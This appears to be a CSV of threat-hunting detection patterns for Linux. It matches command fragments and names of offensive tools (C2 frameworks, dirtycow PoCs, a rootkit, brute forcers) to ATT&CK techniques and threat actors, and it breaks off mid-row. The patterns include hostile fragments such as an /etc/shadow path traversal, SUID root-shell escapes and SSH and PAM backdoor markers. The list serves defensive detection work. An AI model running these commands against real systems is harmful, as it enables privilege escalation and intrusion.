"*955201aaf535183bd7a881278fbaab7a16f742c150ff44e1d7ab0325c0c03baf*",".{0,1000}955201aaf535183bd7a881278fbaab7a16f742c150ff44e1d7ab0325c0c03baf.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","0","#filehash #linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"*arget13/DDexec*",".{0,1000}arget13\/DDexec.{0,1000}","offensive_tool_keyword","Ddexec","A technique to run binaries filelessly and stealthily on Linux by ""overwriting"" the shell's process with another.","T1055.008 - T1106 - T1059.004","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/arget13/DDexec","1","1","#linux","N/A","9","8","799","83","2023-06-09T13:54:30Z","2022-01-27T12:52:10Z"
"*&& cat /etc/motd*exec -a -$(basename $SHELL) $SHELL*",".{0,1000}\&\&\scat\s\/etc\/motd.{0,1000}exec\s\-a\s\-\$\(basename\s\$SHELL\)\s\$SHELL.{0,1000}","offensive_tool_keyword","Openssh","Infecting SSH Public Keys with backdoors","T1098.003 - T1562.004 - T1021.004","TA0006 - TA0002 - TA0011","N/A","BlackSuit - Royal - Akira - Scattered Spider* - FANCY BEAR","C2","https://blog.thc.org/infecting-ssh-public-keys-with-backdoors","1","0","#linux","N/A","10","9","N/A","N/A","N/A","N/A"
"*../../../../../../etc/shadow*",".{0,1000}\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/\.\.\/etc\/shadow.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","1","#linux","N/A","9","10","5977","1385","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z"
"*../tunnelto_lib*",".{0,1000}\.\.\/tunnelto_lib.{0,1000}","greyware_tool_keyword","tunnelto.dev","Expose your local web server to the internet with a public URL","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/agrinman/tunnelto","1","0","#linux","N/A","10","10","2110","114","2022-09-24T21:28:44Z","2020-03-22T05:39:49Z"
"*./*octopus.py*",".{0,1000}\.\/.{0,1000}octopus\.py.{0,1000}","offensive_tool_keyword","octopus","Octopus is an open source. pre-operation C2 server based on python which can control an Octopus powershell agent through HTTP/S.","T1059.001 - T1105 - T1071.001 - T1219 - T1573","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/mhaskar/Octopus","1","1","#linux","N/A","10","10","735","155","2021-07-06T23:52:37Z","2019-08-30T21:09:07Z"
"*./agscript *",".{0,1000}\.\/agscript\s.{0,1000}","offensive_tool_keyword","Earth Lusca Operations Tools","Earth Lusca Operations Tools and commands","T1548.002 - T1098.004 - T1583.001 - T1583.004 - T1583.006 - T1595.002 - T1560.001 - T1547.012 - T1059.001 - T1059.005 - T1059.006 - T1059.007 - T1584.004 - T1584.006 - T1543.003 - T1140 - T1482 - T1189 - T1567.002 - T1190 - T1210 - T1574.002 - T1036.005 - T1112 - T1027 - T1027.003 - T1588.001 - T1588.002 - T1003.001 - T1003.006 - T1566.002 - T1057 - T1090 - T1018 - T1053 - T1608.001 - T1218.005 - T1016 - T1053 - T1049 - T1033 - T1016 - T1049 - T1016 - T1218.001 - T1016 - T1049 - T1033 - T1007 - T1218.005","TA0001 - TA0002 - TA0003","cobaltstrike - mimikatz - powersploit - shadowpad - winnti","Earth Lusca","Exploitation tool","https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf","1","0","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A"
"*./agscript * nemesis-bot *",".{0,1000}\.\/agscript\s.{0,1000}\snemesis\-bot\s.{0,1000}","offensive_tool_keyword","nemesis","An offensive data enrichment pipeline","T1592 - T1583 - T1595 - T1590","TA0042 - TA0043","N/A","N/A","Resource Development","https://github.com/SpecterOps/Nemesis","1","0","#linux","N/A","9","7","620","60","2024-12-05T01:35:14Z","2023-07-13T18:24:24Z"
"*./AutoSUID.sh*",".{0,1000}\.\/AutoSUID\.sh.{0,1000}","offensive_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","7","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./awsloot *",".{0,1000}\.\/awsloot\s.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","0","#linux","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
"*./awsloot.py*",".{0,1000}\.\/awsloot\.py.{0,1000}","offensive_tool_keyword","AWS-Loot","Searches an AWS environment looking for secrets. by enumerating environment variables and source code. This tool allows quick enumeration over large sets of AWS instances and services.","T1552","TA0002","N/A","N/A","Exploitation tool","https://github.com/sebastian-mora/AWS-Loot","1","1","#linux","N/A","N/A","1","69","25","2020-02-02T00:51:56Z","2020-02-02T00:25:46Z"
"*./backdoor.sh *",".{0,1000}\.\/backdoor\.sh\s.{0,1000}","offensive_tool_keyword","linux-pam-backdoor","Linux PAM Backdoor","T1547.001 - T1556.003","TA0003 - TA0004","N/A","N/A","Persistence","https://github.com/zephrax/linux-pam-backdoor","1","0","#linux","N/A","10","4","314","81","2023-11-13T11:29:44Z","2017-06-08T21:14:34Z"
"*./boringproxy server*",".{0,1000}\.\/boringproxy\sserver.{0,1000}","greyware_tool_keyword","boringproxy","Simple tunneling reverse proxy with a fast web UI and auto HTTPS. Designed for self-hosters.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/boringproxy/boringproxy","1","0","#linux","N/A","10","10","1233","117","2024-07-06T10:13:37Z","2020-09-26T21:58:07Z"
"*./Brutesploit*",".{0,1000}\.\/Brutesploit.{0,1000}","offensive_tool_keyword","BruteSploit","BruteSploit is a collection of method for automated Generate. Bruteforce and Manipulation wordlist with interactive shell. That can be used during a penetration test to enumerate and maybe can be used in CTF for manipulation.combine.transform and permutation some words or file text","T1110","N/A","N/A","N/A","Exploitation tool","https://github.com/screetsec/BruteSploit","1","1","#linux","N/A","N/A","8","725","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z"
"*./c2lint *",".{0,1000}\.\/c2lint\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://www.cobaltstrike.com/","1","0","#linux","N/A","10","10","N/A","N/A","N/A","N/A"
"*./capsh --gid=0 --uid=0 --*",".{0,1000}\.\/capsh\s\-\-gid\=0\s\-\-uid\=0\s\-\-.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*debugfs /dev/*",".{0,1000}debugfs\s\/dev\/.{0,1000}","greyware_tool_keyword","debugdfs","Linux SIEM Bypass with debugdfs shell","T1059 - T1053 - T1037","TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","#linux","N/A","N/A","10","1445","187","2024-11-18T14:07:04Z","2021-08-16T17:34:25Z"
"*./chisel client *",".{0,1000}\.\/chisel\sclient\s.{0,1000}","greyware_tool_keyword","wiretap","Wiretap is a transparent - VPN-like proxy server that tunnels traffic via WireGuard and requires no special privileges to run.","T1572","TA0011 - TA0003","N/A","N/A","C2","https://github.com/sandialabs/wiretap","1","0","#linux","chisel","10","9","861","38","2024-11-26T00:33:13Z","2022-11-19T00:19:05Z"
"*./chroot / /bin/sh -p*",".{0,1000}\.\/chroot\s\/\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./cowpy.sh *",".{0,1000}\.\/cowpy\.sh\s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/nowsecure/dirtycow","1","0","#linux","N/A","N/A","1","93","25","2019-05-13T13:17:31Z","2016-10-22T14:00:37Z"
"*./cowroot*",".{0,1000}\.\/cowroot.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/exrienz/DirtyCow","1","0","#linux","N/A","N/A","1","29","25","2018-07-23T02:07:24Z","2017-05-12T10:38:20Z"
"*./CVE-202* -*","\.\/CVE\-20.{0,1000}\s\-.{0,1000}","offensive_tool_keyword","POC","CVE POC execution","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tool","https://github.com/tangxiaofeng7/CVE-2022-22965-Spring-CachedintrospectionResults-Rce","1","0","#linux","N/A","N/A","1","37","14","2022-04-01T08:44:19Z","2022-04-01T07:55:26Z"
"*./dcow -s*",".{0,1000}\.\/dcow\s\-s.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/gbonacini/CVE-2016-5195","1","0","#linux","N/A","N/A","4","316","120","2017-03-21T16:46:38Z","2016-10-23T00:16:33Z"
"*./dedsec_ransomware*",".{0,1000}\.\/dedsec_ransomware.{0,1000}","offensive_tool_keyword","DEDSEC-RANSOMWARE","dedsec ransomware","T1486 - T1489 - T1490 - T1495 - T1488 - T1482","TA0040 - TA0043 - TA0042 - TA0009 - TA0010","N/A","N/A","Ransomware","https://github.com/xelroth/DEDSEC-RANSOMWARE","1","0","#linux","N/A","10","1","6","0","2024-05-17T11:12:23Z","2024-05-17T10:34:03Z"
"*./Dent -*",".{0,1000}\.\/Dent\s\-.{0,1000}","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/optiv/Dent","1","0","#linux","N/A","10","10","296","48","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z"
"*./dirty*",".{0,1000}\.\/dirty.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirtycow vulnerability","T1533","TA0003","N/A","N/A","Exploitation tool","https://github.com/FireFart/dirtycow","1","0","#linux","N/A","N/A","9","864","428","2021-04-08T11:35:12Z","2016-11-25T21:08:01Z"
"*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","t1543","TA0003","N/A","N/A","Exploitation tool","https://github.com/bbaranoff/CVE-2022-0847","1","1","#linux","N/A","N/A","1","49","25","2022-03-07T15:52:23Z","2022-03-07T15:50:18Z"
"*./Dirty-Pipe*",".{0,1000}\.\/Dirty\-Pipe.{0,1000}","offensive_tool_keyword","POC","POC exploitation for dirty pipe vulnerability","T1543","TA0003 - TA0004","N/A","N/A","Exploitation tool","https://github.com/puckiestyle/CVE-2022-0847","1","1","#linux","N/A","N/A","1","2","1","2022-03-10T08:10:40Z","2022-03-08T14:46:21Z"
"*./dnscat*",".{0,1000}\.\/dnscat.{0,1000}","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","EMBER BEAR","C2","https://github.com/iagox86/dnscat2","1","0","#linux","N/A","10","10","3465","607","2024-03-14T11:17:49Z","2013-01-04T23:15:55Z"
"*./dome.py*",".{0,1000}\.\/dome\.py.{0,1000}","offensive_tool_keyword","DOME","DOME - A subdomain enumeration tool","T1583 - T1595 - T1190","TA0011 - TA0009","N/A","N/A","Reconnaissance","https://github.com/v4d1/Dome","1","1","#linux","N/A","5","6","521","76","2024-02-07T09:12:17Z","2022-02-20T15:09:40Z"
"*./donut *.exe*",".{0,1000}\.\/donut\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","6917","972","2024-12-08T00:09:25Z","2022-09-11T13:21:16Z"
"*./dropbear *",".{0,1000}\.\/dropbear\s.{0,1000}","greyware_tool_keyword","dropbear","A smallish SSH server and client","T1021.004 - T1570","TA0003","N/A","COZY BEAR","Persistence","https://github.com/mkj/dropbear","1","0","#linux","N/A","8","10","1754","403","2024-12-04T16:13:34Z","2013-03-19T11:15:36Z"
"* diamorphine.c*",".{0,1000}\sdiamorphine\.c.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*./encryptor -f *.exe*",".{0,1000}\.\/encryptor\s\-f\s.{0,1000}\.exe.{0,1000}","offensive_tool_keyword","mortar","evasion technique to defeat and divert detection and prevention of security products (AV/EDR/XDR)","T1027 - T1562","TA0005","N/A","N/A","Defense Evasion","https://github.com/0xsp-SRD/mortar","1","0","#linux","N/A","8","10","1418","226","2023-12-21T22:00:38Z","2021-11-25T16:49:47Z"
"*./env /bin/sh -p*",".{0,1000}\.\/env\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./evil-proxy*",".{0,1000}\.\/evil\-proxy.{0,1000}","offensive_tool_keyword","evil-proxy","A ruby http/https proxy to do EVIL things","T1557 - T1110.001 - T1563.001","TA0006 - TA0001 - TA0009 - TA0040","N/A","N/A","Phishing","https://github.com/bbtfr/evil-proxy","1","0","#linux","N/A","9","2","171","92","2023-10-30T07:49:40Z","2015-07-30T01:54:40Z"
"*./Exfil.sh*",".{0,1000}\.\/Exfil\.sh.{0,1000}","offensive_tool_keyword","AutoC2","AutoC2 is a bash script written to install all of the red team tools that you know and love","T1059.004 - T1129 - T1486","TA0005 - TA0002 - TA0040","N/A","N/A","Exploitation tool","https://github.com/assume-breach/Home-Grown-Red-Team/tree/main/AutoC2","1","0","#linux","N/A","10","7","673","109","2024-03-22T12:32:22Z","2022-03-23T15:52:41Z"
"*./expect -c 'spawn /bin/sh -p;interact'*",".{0,1000}\.\/expect\s\-c\s\'spawn\s\/bin\/sh\s\-p\;interact\'.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./fake-sms*",".{0,1000}\.\/fake\-sms.{0,1000}","offensive_tool_keyword","fake-sms","A simple command line tool using which you can skip phone number based SMS verification by using a temporary phone number that acts like a proxy.","T1598.003 - T1514","TA0003 - TA0009","N/A","N/A","Defense Evasion","https://github.com/Narasimha1997/fake-sms","1","0","#linux","N/A","8","10","2726","176","2023-08-01T15:34:41Z","2021-02-18T15:18:50Z"
"*./fee.py*",".{0,1000}\.\/fee\.py.{0,1000}","offensive_tool_keyword","fileless-elf-exec","Execute ELF files without dropping them on disk","T1059.003 - T1055.012 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/nnsee/fileless-elf-exec","1","1","#linux","N/A","8","5","482","50","2024-06-28T15:23:21Z","2020-01-06T12:19:34Z"
"*./flock -u / /bin/sh -p*",".{0,1000}\.\/flock\s\-u\s\/\s\/bin\/sh\s\-p.{0,1000}","greyware_tool_keyword","AutoSUID","automate harvesting the SUID executable files and to find a way for further escalating the privileges","T1548.003 - T1069.001 - T1068","TA0004 - TA0003 - TA0005","N/A","N/A","Discovery","https://github.com/IvanGlinkin/AutoSUID","1","0","#linux","N/A","9","4","371","77","2024-04-29T12:30:35Z","2021-11-28T19:44:18Z"
"*./fscan*",".{0,1000}\.\/fscan.{0,1000}","offensive_tool_keyword","fscan","Vulnerability scanner","T1595","TA0042 - TA0007","N/A","Earth Lusca","Reconnaissance","https://github.com/shadow1ng/fscan","1","0","#linux","N/A","8","10","10906","1625","2024-10-25T08:41:45Z","2020-11-13T16:35:20Z"
"*./gcr.py*",".{0,1000}\.\/gcr\.py.{0,1000}","offensive_tool_keyword","GCR-Google-Calendar-RAT","Google Calendar RAT is a PoC of Command&Control over Google Calendar Events","T1071.001 - T1021.002 - T1059","TA0002 - TA0005","N/A","N/A","C2","https://github.com/MrSaighnal/GCR-Google-Calendar-RAT","1","0","#linux","N/A","10","10","216","38","2024-04-11T18:06:02Z","2023-06-18T13:23:31Z"
"* diamorphine.h*",".{0,1000}\sdiamorphine\.h.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*./gimmeSH*",".{0,1000}\.\/gimmeSH.{0,1000}","offensive_tool_keyword","gimmeSH","gimmeSH. is a tool that generates a custom cheatsheet for Reverse Shell. File Transfer and Msfvenom within your terminal. you just need to provide the platform. your Internet protocol address and your port number.","T1059 - T1505","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tool","https://github.com/A3h1nt/gimmeSH","1","1","#linux","N/A","N/A","2","183","28","2021-08-27T03:12:15Z","2021-08-02T07:22:15Z"
"*./GoAWSConsoleSpray*",".{0,1000}\.\/GoAWSConsoleSpray.{0,1000}","offensive_tool_keyword","GoAWSConsoleSpray","brute-force AWS IAM Console credentials to discover valid logins for user accounts","T1078 - T1110 - T1187 - T1110.001","TA0006 - TA0007 - TA0003 - TA0001","N/A","N/A","Credential Access","https://github.com/WhiteOakSecurity/GoAWSConsoleSpray","1","0","#linux","N/A","9","1","26","5","2022-06-15T18:16:21Z","2022-06-15T18:11:39Z"
"*./go-secdump*",".{0,1000}\.\/go\-secdump.{0,1000}","offensive_tool_keyword","go-secdump","Tool to remotely dump secrets from the Windows registry","T1003.002 - T1012 - T1059.003","TA0006 - TA0003 - TA0002","N/A","N/A","Credential Access","https://github.com/jfjallid/go-secdump","1","0","#linux","N/A","10","5","405","43","2024-07-27T10:34:04Z","2023-02-23T17:02:50Z"
"*./GoStompy *",".{0,1000}\.\/GoStompy\s.{0,1000}","offensive_tool_keyword","Stompy","Timestomp Tool to flatten MAC times with a specific timestamp","T1070.006","TA0005","N/A","N/A","Defense Evasion","https://github.com/ZephrFish/Stompy","1","0","#linux","N/A","10","1","45","6","2023-10-15T17:38:23Z","2023-10-14T23:40:32Z"
"*./hashcat -*",".{0,1000}\.\/hashcat\s\-.{0,1000}","offensive_tool_keyword","NetNTLMtoSilverTicket","Obtaining NetNTLMv1 Challenge/Response authentication - cracking those to NTLM Hashes and using that NTLM Hash to sign a Kerberos Silver ticket.","T1110.001 - T1558.003 - T1558.004","TA0006 - TA0008 - TA0002","N/A","N/A","Credential Access","https://github.com/NotMedic/NetNTLMtoSilverTicket","1","0","#linux","N/A","10","8","777","113","2021-07-26T15:16:20Z","2019-01-14T15:32:27Z"
"*./hashview/*",".{0,1000}\.\/hashview\/.{0,1000}","offensive_tool_keyword","hashview","A web front-end for password cracking and analytics","T1110 - T1201","TA0006 - TA0002","N/A","N/A","Credential Access","https://github.com/hashview/hashview","1","0","#linux","N/A","10","4","361","39","2024-11-19T22:54:42Z","2020-11-23T19:21:06Z"
"*./Havoc",".{0,1000}\.\/Havoc","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","#linux","N/A","10","10","6917","972","2024-12-08T00:09:25Z","2022-09-11T13:21:16Z"
"*./havoc *",".{0,1000}\.\/havoc\s.{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","0","#linux","N/A","10","10","6917","972","2024-12-08T00:09:25Z","2022-09-11T13:21:16Z"
"*./hoaxshell*",".{0,1000}\.\/hoaxshell.{0,1000}","offensive_tool_keyword","hoaxshell","An unconventional Windows reverse shell. currently undetected by Microsoft Defender and various other AV solutions. solely based on http(s) traffic","T1059 - T1071 - T1071.001 - T1203","TA0002 - TA0011","N/A","N/A","C2","https://github.com/t3l3machus/hoaxshell","1","0","#linux","N/A","N/A","10","3054","480","2024-07-22T06:58:00Z","2022-07-10T15:36:24Z"
"*./hping *",".{0,1000}\.\/hping\s.{0,1000}","offensive_tool_keyword","hping","hping3 is a network tool able to send custom TCP/IP","T1046 - T1190 - T1200","TA0001 - TA0002 - TA0007","N/A","N/A","Sniffing & Spoofing","https://github.com/antirez/hping","1","0","#linux","N/A","N/A","10","1450","334","2024-07-10T12:38:39Z","2012-06-13T17:41:54Z"
"*./hydra *",".{0,1000}\.\/hydra\s.{0,1000}","offensive_tool_keyword","thc-hydra","Parallelized login cracker which supports numerous protocols to attack.","T1110.001","TA0006","N/A","ALLANITE - BERSERK BEAR","Credential Access","https://github.com/vanhauser-thc/thc-hydra","1","0","#linux","N/A","N/A","10","9820","2040","2024-08-13T06:27:39Z","2014-04-24T14:45:37Z"
"*./inceptor.py*",".{0,1000}\.\/inceptor\.py.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","0","#linux","N/A","10","10","1603","264","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z"
"* hacked_getdents*",".{0,1000}\shacked_getdents.{0,1000}","offensive_tool_keyword","Diamorphine","LKM rootkit for Linux Kernels","T1547.006 - T1548.002 - T1562.001 - T1027","TA0003 - TA0004 - TA0005 - TA0006 - TA0007","N/A","N/A","Persistence","https://github.com/m0nad/Diamorphine","1","0","#linux","N/A","10","10","1856","436","2023-09-20T10:56:06Z","2013-11-06T22:38:47Z"
"*./iodined*",".{0,1000}\.\/iodined.{0,1000}","offensive_tool_keyword","iodine","iodine. iodined - tunnel IPv4 over DNS","T1573.001 - T1573.002 - T1573.003 - T1573.004","TA0011 - TA0010 - TA0002 - TA0005","N/A","EMBER BEAR","C2","https://github.com/yarrick/iodine","1","0","#linux","N/A","10","10","6270","509","2024-10-30T09:08:59Z","2012-02-04T19:51:39Z"
"*./Ivy -*",".{0,1000}\.\/Ivy\s\-.{0,1000}","offensive_tool_keyword","ivy","Ivy is a payload creation framework for the execution of arbitrary VBA (macro) source code directly in memory","T1059 - T1204 - T1547","TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/optiv/Ivy","1","0","#linux","N/A","10","8","740","127","2023-08-18T17:30:14Z","2021-11-18T18:29:20Z"
"*./kali-install.sh*",".{0,1000}\.\/kali\-install\.sh.{0,1000}","offensive_tool_keyword","link","link is a command and control framework written in rust","T1071 - T1094 - T1132 - T1008 - T1024","TA0011 - TA0002 - TA0005","N/A","N/A","C2","https://github.com/postrequest/link","1","0","#linux","N/A","10","10","563","88","2021-08-18T11:53:55Z","2021-02-02T11:15:43Z"
"*./kerbrute *",".{0,1000}\.\/kerbrute\s.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","#linux","N/A","10","10","2694","418","2024-08-20T10:56:06Z","2019-02-03T18:21:17Z"
"*./koadic*",".{0,1000}\.\/koadic.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1548.002 - T1071.001 - T1547.001 - T1115 - T1059.001 - T1059.003 - T1059.005 - T1005 - T1573.002 - T1083 - T1564.003 - T1105 - T1046 - T1135 - T1003.002 - T1003.003 - T1055.001 - T1021.001 - T1053.005 - T1218.005 - T1218.010 - T1218.011 - T1082 - T1016 - T1033 - T1569.002 - T1047","TA0004 - TA0011 - TA0003 - TA0008 - TA0002 - TA0009 - TA0010 - TA0005 - TA0006 - TA0007","N/A","PYSA - BlackCat - LockBit - APT28 - LazyScripter - Sidewinder - MuddyWater - FANCY 